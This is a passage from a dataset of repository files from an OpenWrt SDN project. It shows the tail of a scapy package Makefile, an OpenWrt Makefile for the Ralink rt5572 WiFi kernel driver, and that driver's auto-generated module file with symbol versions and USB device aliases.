Package/python-scapy/install\n\t$(INSTALL_DIR) $(1)$(PYTHON_PKG_DIR)\n\t$(INSTALL_DIR) $(1)/bin\n\t$(INSTALL_BIN) $(PKG_BUILD_DIR)/bin/scapy $(1)/bin/\n\t$(INSTALL_BIN) $(PKG_BUILD_DIR)/bin/UTscapy $(1)/bin/\n\t$(CP) \\\n\t\t$(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)/scapy \\\n\t\t$(1)$(PYTHON_PKG_DIR)\nendef\n\n$(eval $(call BuildPackage,python-scapy))\n\n"
},
{
"alpha_fraction": 0.6811857223510742,
"alphanum_fraction": 0.7320024371147156,
"avg_line_length": 26.53333282470703,
"blob_id": "3e46dda6b43700b2e650ec89fc590aabcbc21c46",
"content_id": "10294caaa411b7e01451f4cd3497d9be8f8869ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1653,
"license_type": "no_license",
"max_line_length": 359,
"num_lines": 60,
"path": "/packages/rt5572/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2012 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\ninclude $(INCLUDE_DIR)/kernel.mk\n\nPKG_NAME:=rt5572\nPKG_VERSION:=2.6.1\nPKG_RELEASE:=3\n\nPKG_BUILD_PARALLEL:=1\n\ninclude $(INCLUDE_DIR)/package.mk\n\ndefine KernelPackage/rt5572\n SUBMENU:=Wireless Drivers\n TITLE:=Ralink rt5572 WiFi\n FILES:= \\\n\t$(PKG_BUILD_DIR)/RT2870STA.dat \\\n\t$(PKG_BUILD_DIR)/os/linux/rt5572sta.ko\n MAINTAINER:[email protected]\n AUTOLOAD:=$(call AutoLoad,50, rt5572)\nendef\n\ndefine KernelPackage/rt5572/description\n Driver for Ralink rt5572 wireless devices.\nendef\n\nWFLAGS=-DRTMP_MAC_USB -DRT30xx -DRT33xx -DRT3070 -DRT3370 -DRT5370 -DRTMP_USB_SUPPORT -DRTMP_TIMER_TASK_SUPPORT -DRTMP_RF_RW_SUPPORT -DRTMP_EFUSE_SUPPORT -DRTMP_INTERNAL_TX_ALC -DRTMP_FREQ_CALIBRATION_SUPPORT -DVCORECAL_SUPPORT -DIQ_CAL_SUPPORT -DRTMP_TEMPERATURE_COMPENSATION -DDOT11_N_SUPPORT -DCONFIG_RA_NAT_NONE -DDBG -DA_BAND_SUPPORT -DCONFIG_STA_SUPPORT\n\n#-DEXT_BUILD_CHANNEL_LIST\n\nMAKE_OPTS:= \\\n\tARCH=\"$(LINUX_KARCH)\" \\\n\tCROSS_COMPILE=\"$(TARGET_CROSS)\" \\\n\tEXTRA_CFLAGS=\"-DCONFIG_LITTLE_ENDIAN -I$(PKG_BUILD_DIR)/include -DLINUX -DCONFIG_STA_SUPPORT $(WFLAGS)\" \\\n\tLINUX_SRC=$(LINUX_DIR) \\\n\tKSRC=$(LINUX_DIR)\n\ndefine Build/Prepare\n\tmkdir -p $(PKG_BUILD_DIR)\n\t$(CP) ./src/* $(PKG_BUILD_DIR)/\n\t$(Build/Patch)\nendef\n\ndefine Build/Compile\n\t$(MAKE) $(PKG_JOBS) -C $(PKG_BUILD_DIR) $(MAKE_OPTS)\n\nendef\n\ndefine KernelPackage/rt5572/install\n\tmkdir -p $(1)/etc/Wireless/RT2870STA/\n\t$(INSTALL_DATA) $(PKG_BUILD_DIR)/RT2870STA.dat $(1)/etc/Wireless/RT2870STA/\nendef\n\n$(eval $(call KernelPackage,rt5572))\n\n"
},
{
"alpha_fraction": 0.5676993131637573,
"alphanum_fraction": 0.6977567076683044,
"avg_line_length": 43.5773811340332,
"blob_id": "c4bd260f35feff552a7d4ad337ae348afe144620",
"content_id": "cd7e4c99af6aca25c7ffd12b3a88b4a207353551",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 14978,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 336,
"path": "/packages/rt5572/src/os/linux/rt5572sta.mod.c",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#include <linux/module.h>\n#include <linux/vermagic.h>\n#include <linux/compiler.h>\n\nMODULE_INFO(vermagic, VERMAGIC_STRING);\n\nstruct module __this_module\n__attribute__((section(\".gnu.linkonce.this_module\"))) = {\n\t.name = KBUILD_MODNAME,\n\t.init = init_module,\n#ifdef CONFIG_MODULE_UNLOAD\n\t.exit = cleanup_module,\n#endif\n\t.arch = MODULE_ARCH_INIT,\n};\n\nstatic const struct modversion_info ____versions[]\n__used\n__attribute__((section(\"__versions\"))) = {\n\t{ 0xa8c16cf3, \"module_layout\" },\n\t{ 0x3defeb5e, \"register_netdevice\" },\n\t{ 0x9a1dfd65, \"strpbrk\" },\n\t{ 0xd2b09ce5, \"__kmalloc\" },\n\t{ 0xf9a482f9, \"msleep\" },\n\t{ 0x4c4fef19, \"kernel_stack\" },\n\t{ 0xd6ee688f, \"vmalloc\" },\n\t{ 0x349cba85, \"strchr\" },\n\t{ 0x754d539c, \"strlen\" },\n\t{ 0xc29bf967, \"strspn\" },\n\t{ 0xc5ac94d0, \"dev_set_drvdata\" },\n\t{ 0xc8b57c27, \"autoremove_wake_function\" },\n\t{ 0xb5dcab5b, \"remove_wait_queue\" },\n\t{ 0xc7a4fbed, \"rtnl_lock\" },\n\t{ 0x47939e0d, \"__tasklet_hi_schedule\" },\n\t{ 0xb10d2a48, \"netif_carrier_on\" },\n\t{ 0x1637ff0f, \"_raw_spin_lock_bh\" },\n\t{ 0xae68c5b2, \"skb_clone\" },\n\t{ 0x4579655a, \"dev_get_by_name\" },\n\t{ 0xf22449ae, \"down_interruptible\" },\n\t{ 0xbf2ae0f, \"netif_carrier_off\" },\n\t{ 0xc1e2a8ff, \"usb_kill_urb\" },\n\t{ 0xbeb83495, \"filp_close\" },\n\t{ 0xeae3dfd6, \"__const_udelay\" },\n\t{ 0xfb0e29f, \"init_timer_key\" },\n\t{ 0x85df9b6c, \"strsep\" },\n\t{ 0x999e8297, \"vfree\" },\n\t{ 0x91715312, \"sprintf\" },\n\t{ 0x3bcbbb33, \"kthread_create_on_node\" },\n\t{ 0x7d11c268, \"jiffies\" },\n\t{ 0xe43f6a80, \"skb_trim\" },\n\t{ 0xe2d5255a, \"strcmp\" },\n\t{ 0xbe2ed7d2, \"__netdev_alloc_skb\" },\n\t{ 0x27f2852, \"netif_rx\" },\n\t{ 0xf432dd3d, \"__init_waitqueue_head\" },\n\t{ 0x4f8b5ddb, \"_copy_to_user\" },\n\t{ 0xffd5a395, \"default_wake_function\" },\n\t{ 0x35b6b772, \"param_ops_charp\" },\n\t{ 0xd5f2172f, \"del_timer_sync\" },\n\t{ 0xfb578fc5, \"memset\" },\n\t{ 0x11089ac7, \"_ctype\" },\n\t{ 0x8f64aa4, \"_raw_spin_unlock_irqrestore\" },\n\t{ 0x571ab46f, \"current_task\" },\n\t{ 0xf147ecb1, \"down_trylock\" },\n\t{ 0x562b9321, \"usb_deregister\" },\n\t{ 0x27e1a049, \"printk\" },\n\t{ 0x20c55ae0, \"sscanf\" },\n\t{ 0xda2d560c, \"kthread_stop\" },\n\t{ 0x449ad0a7, \"memcmp\" },\n\t{ 0x6b3c99ec, \"free_netdev\" },\n\t{ 0xa1c76e0a, \"_cond_resched\" },\n\t{ 0x9166fada, \"strncpy\" },\n\t{ 0x3dffe1a5, \"register_netdev\" },\n\t{ 0xb4390f9a, \"mcount\" },\n\t{ 0x60b71cbb, \"wireless_send_event\" },\n\t{ 0xab394b6d, \"usb_control_msg\" },\n\t{ 0x16305289, \"warn_slowpath_null\" },\n\t{ 0x848dad9c, \"skb_push\" },\n\t{ 0x72834cac, \"dev_close\" },\n\t{ 0x9545af6d, \"tasklet_init\" },\n\t{ 0x8834396c, \"mod_timer\" },\n\t{ 0xbe2c0274, \"add_timer\" },\n\t{ 0xac28405, \"skb_pull\" },\n\t{ 0xbc3d2398, \"usb_free_coherent\" },\n\t{ 0x8f96f86d, \"dev_kfree_skb_any\" },\n\t{ 0x61651be, \"strcat\" },\n\t{ 0x82072614, \"tasklet_kill\" },\n\t{ 0xf91e5126, \"module_put\" },\n\t{ 0xcbf1ca89, \"skb_copy_expand\" },\n\t{ 0x8537b91d, \"netif_device_attach\" },\n\t{ 0x29e696a8, \"usb_submit_urb\" },\n\t{ 0xeaa9098a, \"netif_device_detach\" },\n\t{ 0x550dae9a, \"usb_get_dev\" },\n\t{ 0xba63339c, \"_raw_spin_unlock_bh\" },\n\t{ 0xf0fdf6cb, \"__stack_chk_fail\" },\n\t{ 0x8717c670, \"usb_put_dev\" },\n\t{ 0xd62c833f, \"schedule_timeout\" },\n\t{ 0x1000e51, \"schedule\" },\n\t{ 0xf5373238, \"eth_type_trans\" },\n\t{ 0x939708e0, \"wake_up_process\" },\n\t{ 0xe048dad7, \"pskb_expand_head\" },\n\t{ 0x9327f5ce, \"_raw_spin_lock_irqsave\" },\n\t{ 0x5365b016, \"unregister_netdevice_queue\" },\n\t{ 0xcf21d241, \"__wake_up\" },\n\t{ 0xd2965f6f, \"kthread_should_stop\" },\n\t{ 0x5860aad4, \"add_wait_queue\" },\n\t{ 0x37a0cba, \"kfree\" },\n\t{ 0x69acdf38, \"memcpy\" },\n\t{ 0x801678, \"flush_scheduled_work\" },\n\t{ 0x5c8b5ce8, \"prepare_to_wait\" },\n\t{ 0x71e3cecb, \"up\" },\n\t{ 0xdeb87602, \"usb_register_driver\" },\n\t{ 0xfa66f77c, \"finish_wait\" },\n\t{ 0xf72b1067, \"unregister_netdev\" },\n\t{ 0xb742fd7, \"simple_strtol\" },\n\t{ 0x28318305, \"snprintf\" },\n\t{ 0x2e10cca7, \"__netif_schedule\" },\n\t{ 0xb0e602eb, \"memmove\" },\n\t{ 0x30d8c27b, \"usb_alloc_coherent\" },\n\t{ 0xb9b3502f, \"skb_put\" },\n\t{ 0x4f6b400b, \"_copy_from_user\" },\n\t{ 0x70c55916, \"dev_get_drvdata\" },\n\t{ 0x316eae64, \"usb_free_urb\" },\n\t{ 0x6e720ff2, \"rtnl_unlock\" },\n\t{ 0x9e7d6bd0, \"__udelay\" },\n\t{ 0xfed54737, \"try_module_get\" },\n\t{ 0xb93b2d19, \"usb_alloc_urb\" },\n\t{ 0xe914e41e, \"strcpy\" },\n\t{ 0xfd306865, \"filp_open\" },\n\t{ 0x20ac9778, \"alloc_etherdev_mqs\" },\n};\n\nstatic const char __module_depends[]\n__used\n__attribute__((section(\".modinfo\"))) =\n\"depends=\";\n\nMODULE_ALIAS(\"usb:v148Fp2770d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp2870d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p2870d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p2770d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0039d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p003Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap7512d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0789p0162d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0789p0163d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0789p0164d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v177Fp0302d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0B05p1731d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0B05p1732d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0B05p1742d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0017d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p002Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p002Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p002Dd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C06d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C28d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2019pED06d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C09d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C11d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C07d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v050Dp8053d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C23d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C27d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07AAp002Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07AAp003Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07AAp003Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1044p800Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v15A9p0006d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApB522d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApA618d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap8522d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap7522d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0CDEp0022d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0586p3416d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0CDEp0025d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9701d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9702d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p200Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C25d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3247d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap6618d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v15C5p0008d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0E66p0001d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0E66p0003d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v129Bp1828d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v157Ep300Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v050Dp805Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v050Dp815Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1482p3C09d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C09d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04E8p2018d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0740d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0280d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0282d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p7718d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p7717d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1737p0070d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1737p0071d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0411p00E8d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v050Dp815Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v100Dp9031d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p6899d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3070d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3071d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3072d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3820d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p871Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p822Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p871Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p822Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p003Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0042d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0048d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0047d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p005Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v14B2p3C12d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v18C5p0012d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083Ap7511d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApA701d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApA702d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9703d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9705d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9706d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9707d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9708d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9709d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3273d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3305d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1044p800Dd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2019pAB25d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2019p5201d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p3070d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p3071d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07B8p3072d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p7711d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p4085d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1A32p0304d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1EDAp2012d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1EDAp2310d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C0Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C0Dd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C0Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C0Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C16d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07D1p3C17d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1D4Dp000Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1D4Dp000Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1D4Dp0011d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p5257d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0283d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04BBp0945d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04BBp0947d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04BBp0948d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v203Dp1480d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v20B8p8888d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0B05p1784d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v203Dp14A9d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p899Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3870d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p870Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p6899d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3822d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3871d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p871Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p822Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p3821d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DB0p821Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0282d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApA703d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3307d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3321d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3329d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v07FAp7712d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0789p0166d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0586p341Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0586p341Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0586p343Ed*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1EDAp2012d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1EDAp2210d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C1Bd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApB511d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3572d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1740p9801d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0041d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0042d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04BBp0944d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0740d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0744d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v5A57p0284d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v167Bp4001d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0764d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0930p0A07d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1690p0761d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13B1p002Fd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1737p0079d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0065d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0066d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0068d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3370d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0050d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v083ApB511d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p20DDd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp3573d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v7392p7733d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0846p9012d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0DF6p0067d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v1875p7733d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0E66p0021d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2019pED19d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp5370d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp5372d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3365d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v13D3p3329d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C15d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C19d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C1Cd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C1Dd*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A12d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A22d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A32d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A42d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04DAp1800d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04DAp1801d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v04DAp23F6d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2104d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2180d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2181d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2182d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v0471p2126d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v057Cp8501d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v148Fp5572d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A32d*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v2001p3C1Ad*dc*dsc*dp*ic*isc*ip*\");\nMODULE_ALIAS(\"usb:v043Ep7A13d*dc*dsc*dp*ic*isc*ip*\");\n\nMODULE_INFO(srcversion, \"0437D721DA31F3109C8F9D3\");\n"
},
{
